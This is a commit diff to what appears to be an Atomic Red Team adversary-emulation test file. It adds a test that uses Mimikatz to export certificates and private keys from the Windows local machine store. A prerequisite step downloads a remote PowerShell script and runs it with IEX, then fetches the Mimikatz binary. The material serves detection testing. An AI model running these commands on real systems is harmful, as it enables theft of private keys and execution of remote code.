Update T1552.004.yaml (#2327)

atomics/T1552.004/T1552.004.yaml

@@ -274,4 +274,33 @@ atomic_tests:
       }
       catch { }
     name: powershell
-    elevation_required: true 
+    elevation_required: true 
+- name: Export Certificates with Mimikatz
+  description: |
+    The following Atomic test will utilize Mimikatz to extract the certificates from the local system My store. This tool is available at https://github.com/gentilkiwi/mimikatz and can be obtained using the get-prereq_commands.
+    A successful attempt will stdout the certificates and write multiple .pfx and .der files to disk.
+  supported_platforms:
+  - windows
+  input_arguments:
+    mimikatz_exe:
+      description: Path of the Mimikatz binary
+      type: String
+      default: PathToAtomicsFolder\T1003.001\bin\x64\mimikatz.exe
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      Mimikatz must exist on disk at specified location (#{mimikatz_exe})
+    prereq_command: |
+      if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1}
+    get_prereq_command: |
+      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+      IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing) 
+      $releases = "https://api.github.com/repos/gentilkiwi/mimikatz/releases"
+      $zipUrl = (Invoke-WebRequest $releases | ConvertFrom-Json)[0].assets.browser_download_url | where-object { $_.endswith(".zip") }
+      $basePath = Split-Path #{mimikatz_exe} | Split-Path
+      Invoke-FetchFromZip $zipUrl "x64/mimikatz.exe" $basePath
+  executor:
+    command: |
+      #{mimikatz_exe} "crypto::certificates /systemstore:local_machine /store:my /export"  exit
+    name: command_prompt
+    elevation_required: true